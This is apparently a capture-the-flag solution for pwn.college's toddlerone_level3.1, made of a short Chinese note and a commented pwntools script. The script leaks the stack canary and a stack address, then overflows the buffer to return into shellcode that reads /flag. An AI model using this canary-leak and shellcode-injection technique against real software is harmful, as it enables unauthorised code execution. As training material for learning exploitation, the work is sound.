3.1
需要注意两个点，一个是read的位置，一个是每次启动challenge函数后栈的长度变化
from pwn import *
# pwntools script for the pwn.college challenge binary spawned below.
# Three inputs are sent to the same process: (1) leak the stack canary,
# (2) leak a stack value that serves as the address base, (3) send the
# payload that restores the canary and jumps to stack-resident shellcode.
context.log_level='info'
r = process(["/challenge/toddlerone_level3.1"])
# Stage-3 shellcode: amd64 Linux "cat /flag", assembled into raw bytes.
payload = asm(shellcraft.amd64.linux.cat('/flag'), arch='amd64')
# Input 1: 6 + 18 + 1 = 25 bytes.  The trailing 'b' is the byte at offset 24,
# the same slot that payload3 below fills with p64(canary); the echo consumed
# on the next lines is read starting right after this 'b'.
payload1 = b'REPEAT' + b'a'*(0x28-6-8*2) + b'b'
# NOTE(review): a str is passed where pwntools documents bytes; pwntools encodes
# it, but `str(len(payload1)).encode()` would keep it explicit (same on the two
# later size prompts and on the str delimiters given to recvuntil below).
r.sendlineafter(b'Payload size: ', str(len(payload1)))
# sendafter (no newline) so the byte count sent matches the size just announced.
r.sendafter(b'bytes)!\n', payload1)
# Discard the echo up to and including the 'aaaaaaaab' marker.
print(r.recvuntil("aaaaaaaab"))
# The next 7 echoed bytes are treated as canary bytes 1..7; rjust pads a zero
# low byte.  This presumes the canary's lowest byte is 0x00 and that the 'b'
# above overwrote it so the echo could run past it — TODO confirm.
canary = u64(r.recv(7).rjust(8, b'\x00'))
log.success("canary => {}".format(hex(canary)))
# r.recvall()
# Input 2: 6 + 26 + 16 + 8 = 56 (0x38) bytes, ending in the marker 'aaaaaaab'.
# Offsets 24..31 (the canary slot as used by payload3) are overwritten with 'a'
# here, so the script relies on the function not returning before input 3 puts
# the real canary back — presumably the 'REPEAT' prefix keeps the same frame
# alive; TODO confirm against the binary.
payload2 = b'REPEAT' + b'a'*(0x28-6-8) + b'a'*0x10 + b'aaaaaaab'
log.info(str(payload2))
r.sendlineafter(b'Payload size: ', str(len(payload2)))
r.sendafter(b'bytes)!\n', payload2)
r.recvuntil('aaaaaaaab')
# Everything echoed after the marker up to the newline is taken as a
# little-endian pointer (ljust fills the missing high bytes with zeros).
# Despite the name, this is the value 0x38 bytes into the buffer, not the slot
# at offset 40 that payload3 overwrites; the fixed -0x1140-0x70*2+8 adjustment
# below turns it into the address of the shellcode — TODO confirm which saved
# pointer is actually being read here.
ret_addr = u64(r.recvline()[:-1].ljust(8, b'\x00'))
log.success("ret addr => {}".format(hex(ret_addr)))
# Input 3: 6 + 18 bytes of filler, the leaked canary at offset 24, 8 bytes
# (presumably the saved frame pointer) at offset 32, then at offset 40 the
# return address pointing at the shellcode appended right after it.  This
# input starts with 'aaaaaa' rather than 'REPEAT'.
# NOTE(review): returning into stack-resident shellcode only works if the
# stack is executable for this binary; 0x1140 and 0x70*2 are tied to this
# particular build and stack layout, so a different build needs new values.
payload3 = b'aaaaaa' + b'a'*(0x28-6-8*2) + p64(canary) + b'aaaaaaaa' + p64(ret_addr-0x1140-0x70*2+8) + payload
log.info(str(payload3))
r.sendlineafter(b'Payload size: ', str(len(payload3)))
r.sendafter(b'bytes)!\n', payload3)
# Hand the session over to the user so the shellcode's output can be read.
r.interactive()
Q.E.D.